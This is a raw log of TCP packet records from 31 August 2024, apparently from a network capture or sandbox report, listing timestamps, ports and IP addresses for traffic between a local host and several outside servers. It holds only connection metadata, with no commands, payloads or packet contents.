Aug 31, 2024 15:44:18.879772902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879796982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879849911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879858971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879869938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879879951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879889965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879910946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879914999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879926920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879934072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880036116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880646944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880656004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880666018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880682945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880692005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880697012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880709887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880718946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880727053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880729914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880754948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880767107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880906105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880916119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880924940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880943060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880953074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880954981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880964041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880975008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880979061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.880985975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.880990028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.881019115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.881047010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.897738934 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.903244972 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.908082008 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.908092022 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.908099890 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.908241987 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.908252954 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.908262968 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.932219028 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932229996 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932250977 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932260036 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932271004 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932292938 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.932292938 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.932323933 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.932615042 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.932826996 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.964809895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.964884043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.964922905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.964931965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.964977980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.964992046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965003014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965013027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965022087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965033054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965038061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.965059996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.965075016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.965946913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965956926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965967894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.965990067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966011047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966114998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966125011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966135025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966151953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966164112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966171026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966171980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966182947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966187000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966192961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966204882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966211081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966221094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966221094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966237068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966248035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966259956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966279984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966315985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966794014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966804028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966814041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966835022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966845036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966847897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966855049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966871977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966878891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966878891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966898918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966907978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966932058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966944933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966953993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966964006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966979980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966979980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.966989040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.966991901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967005014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967010975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.967029095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.967036009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.967674971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967685938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967696905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967706919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967710972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967752934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.967777967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967788935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.967829943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968147039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968157053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968168020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968203068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968276978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968287945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968296051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968334913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968388081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968430042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968468904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968528032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968556881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968556881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968594074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968636990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968655109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968666077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968676090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968722105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968816996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968826056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968836069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968844891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968853951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968864918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968866110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968880892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968880892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968893051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968899012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968903065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.968919039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968930006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.968947887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969769955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969816923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969826937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969829082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969863892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969863892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969880104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969891071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969901085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969912052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.969922066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969938993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.969949007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970069885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970082998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970093012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970103025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970125914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970134974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970150948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970160961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970170975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970179081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970187902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970191002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970199108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970210075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970211029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970231056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970238924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970248938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970259905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970268965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970278025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970295906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970304012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970346928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970356941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970366001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970375061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970386028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970396996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970412016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970424891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970448971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970470905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970526934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970530987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970568895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970628977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970638990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970649004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970678091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970690966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970691919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970698118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970731020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970738888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.970748901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.970793009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.971230984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971240044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971246004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971297026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971304893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.971314907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971324921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971334934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971343994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.971349955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.971364021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.971381903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.972945929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.972959042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.972968102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.972976923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.972995996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.973004103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.973011017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.973014116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.973027945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.973045111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.973057032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.983472109 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.983490944 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.983500004 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.983525991 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.983525991 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.983546019 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.984307051 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.984317064 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.984325886 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.984365940 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.984365940 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.046435118 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.057898045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.057955980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.057965994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058027029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058037996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058039904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058039904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058058023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058068991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058079004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058079958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058089972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058104038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058111906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058123112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058135986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058135986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058149099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058161020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058181047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058185101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058199883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058201075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058212042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058223009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058233023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058239937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058254004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058270931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058276892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058288097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058310032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058320999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058330059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058358908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058372021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058455944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058500051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058510065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058537960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058551073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058604956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058615923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058626890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058665991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058701992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058769941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058801889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058813095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058825970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058841944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058844090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058854103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058856964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058865070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058876038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.058877945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058890104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058906078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.058918953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059410095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059422016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059432030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059463024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059473038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059477091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059484959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059497118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059508085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059508085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059528112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059529066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059540033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059545040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059551954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059567928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059575081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059588909 CEST	80	49727	52.212.52.84	192.168.2.5
